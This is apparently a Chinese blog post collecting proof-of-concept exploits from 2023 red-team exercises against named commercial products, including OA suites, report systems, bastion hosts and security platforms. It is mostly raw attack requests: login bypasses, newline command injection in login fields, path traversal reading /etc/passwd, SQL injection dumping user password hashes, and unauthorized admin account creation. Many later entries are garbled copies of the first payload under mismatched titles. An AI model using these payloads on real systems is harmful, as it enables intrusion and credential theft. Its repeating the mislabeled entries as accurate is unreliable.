正文

2023HWPOC搜集

admin
admin V管理员 /0 评论 /63 阅读
1007
此篇文章发布距今已超过107天,您需要注意文章的内容或图片是否可用!

免责声明

  由于传播、利用作者所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

汉得SRM tomcat.jsp 登录绕过漏洞 

/tomcat.jsp?dataName=role_id&dataValue=1/tomcat.jsp?dataName=user_id&dataValue=1然后访问后台:/main.screen

某服 sxf-报表系统

POST /rep/login HTTP/1.1 Host: URLCookie: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0 Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,*/*;q=0.8 Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2 Accept-Encoding: gzip deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache14 Te: trailers Connection: close Content-Type:application/x-www-form-urlencoded Content-Length: 126 clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq

某盟sas安全审计系统任意文件读取漏洞

/webconf/GetFile/indexpath=../../../../../../../../../../../../../../etc/passwd

某凌OA前台代码执行

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host: www.ynjd.cn:801User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept: /Connection: Keep-AliveContent-Length: 42Content-Type: application/x-www-form-urlencodedvar={"body":{"file":"file:///etc/passwd"}}

某联达oa sql注入漏洞

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1Host: xxx.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 88dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

某达OA sql注入漏洞

GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

某x服应用交付系统命令执行漏洞

POST /rep/loginHost:10.10.10.1:85clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123

某信景云终端安全管理系统 login SQL注入漏洞

POST /api/user/logincaptcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='

某恒明御运维审计与风险控制系统堡垒机任意用户注册

POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1Host: xxxCookie: LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848Cache-Control: max-age=0Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 1121<?xml version="1.0"?><methodCall><methodName>web.user_add</methodName><params><param><value><array><data><value><string>admin</string></value><value><string>5</string></value><value><string>XX.XX.XX.XX</string></value></data></array></value></param><param><value><struct><member><name>uname</name><value><string>deptadmin</string></value></member><member><name>name</name><value><string>deptadmin</string></value></member><member><name>pwd</name><value><string>Deptadmin@123</string></value></member><member><name>authmode</name><value><string>1</string></value></member><member><name>deptid</name><value><string></string></value></member><member><name>email</name><value><string></string></value></member><member><name>mobile</name><value><string></string></value></member><member><name>comment</name><value><string></string></value></member><member><name>roleid</name><value><string>101</string></value></member></struct></value></param></params></methodCall>

HiKVISION 综合安防管理平台 report 任意文件上传漏洞

/tomcat.jsp?dataName=role_id&dataValue=1/tomcat.jsp?dataName=user_id&dataValue=1然后访问后台:/main.screen0

HiKVISION 综合安防管理平台 files 任意文件上传漏洞

/tomcat.jsp?dataName=role_id&dataValue=1/tomcat.jsp?dataName=user_id&dataValue=1然后访问后台:/main.screen1

某微 E-Cology 某版本 SQL注入漏洞

/tomcat.jsp?dataName=role_id&dataValue=1/tomcat.jsp?dataName=user_id&dataValue=1然后访问后台:/main.screen2

某和OA C6-GetSqlData.aspx SQL注入漏洞

/tomcat.jsp?dataName=role_id&dataValue=1/tomcat.jsp?dataName=user_id&dataValue=1然后访问后台:/main.screen3

大华智慧园区综合管理平台 searchJson SQL注入漏洞

/tomcat.jsp?dataName=role_id&dataValue=1/tomcat.jsp?dataName=user_id&dataValue=1然后访问后台:/main.screen4

大华智慧园区综合管理平台 文件上传漏洞

/tomcat.jsp?dataName=role_id&dataValue=1/tomcat.jsp?dataName=user_id&dataValue=1然后访问后台:/main.screen5

某友时空KSOA PayBill SQL注入漏洞

/tomcat.jsp?dataName=role_id&dataValue=1/tomcat.jsp?dataName=user_id&dataValue=1然后访问后台:/main.screen6

某盟 SAS堡垒机 local_user.php 任意用户登录漏洞

/tomcat.jsp?dataName=role_id&dataValue=1/tomcat.jsp?dataName=user_id&dataValue=1然后访问后台:/main.screen7

某盟 SAS堡垒机 GetFile 任意文件读取漏洞

/tomcat.jsp?dataName=role_id&dataValue=1/tomcat.jsp?dataName=user_id&dataValue=1然后访问后台:/main.screen8

某盟 SAS堡垒机 Exec 远程命令执行漏洞

/tomcat.jsp?dataName=role_id&dataValue=1/tomcat.jsp?dataName=user_id&dataValue=1然后访问后台:/main.screen9

某微E-Office9文件上传漏洞

POST /rep/login HTTP/1.1 Host: URLCookie: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0 Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,*/*;q=0.8 Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2 Accept-Encoding: gzip deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache14 Te: trailers Connection: close Content-Type:application/x-www-form-urlencoded Content-Length: 126 clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq0


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
ZhouSa.com-宙飒天下网